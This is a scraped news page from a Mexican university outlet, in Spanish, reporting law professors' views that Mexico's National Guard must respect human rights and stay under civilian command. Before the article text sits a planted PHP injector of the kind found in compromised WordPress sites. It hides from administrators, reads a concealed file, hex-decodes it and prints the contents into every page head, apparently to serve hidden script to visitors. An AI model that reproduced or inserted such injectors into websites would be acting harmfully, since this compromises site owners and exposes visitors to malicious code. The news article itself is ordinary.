if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Guardia Nacional debe respetar los derechos humanos: ELDP – La Opinión Universitaria La Opinión Universitaria
Menu

Guardia Nacional debe respetar los derechos humanos: ELDP

 

Mary González

 

Catedráticos de la Escuela Libre de Derecho de Puebla avalaron la integración de la Guardia Nacional en el país, al tiempo de remarcar se tiene que integrar por civiles y policías militares, además de que tiene que respetar en todo momento los derechos humanos.

En este sentido, el académico Jaime Brito Uriarte consideró que pese a que el gobierno federal ha mencionado en diversas ocasiones que la Guardia Nacional es necesaria porque los elementos de seguridad han sido rebasados por la delincuencia, se requiere tener un cuidado especial en la conformación de la misma.

Dijo que la Guardia Nacional no debe ser permanente y debe estar bajo el mando de una autoridad civil.

Agregó que desde 1917 la Guardia Nacional ha existido constitucionalmente pero nunca se llegó a organizar correctamente y se quiso conformar por civiles, es de mencionar que el titular de cada cuerpo en las entidades era el propio gobernador.

“El problema es organizar y mezclar tanto a civiles como fuerzas armadas, porque tienen formaciones distintas, no es fácil para los militares aceptar órdenes de civiles, además de estar organizada, debe estar fundamentada y regulada constitucionalmente, para que quede claro que no se está en un Estado de guerra sino que se trata de combatir a la delincuencia organizada”, remarcó.

En su intervención José Antonio Aguas Cruz negó que el presidente de la república, Andrés Manuel López Obrador intente militarizar el país con la Guardia Nacional y explicó que los cuerpos militares en funciones de seguridad, y en este caso se está involucrando a la propia sociedad civil.

Por otra parte destacó que el hecho de que el Ejército Mexicano participe en los retenes instalados en distintas calles no representa ningún riesgo para la población, aunque pudiera ser inconstitucional.

“Los militares nos detienen y muy respetuosamente nos dicen: estamos atendiendo a la Ley Federal de Armas de Fuego y Explosivos, esos militares están conscientes que no están combatiendo a un enemigo, sino que están haciendo funciones policiales”, refirió.

No comments

Deja una respuesta

Tweets recientes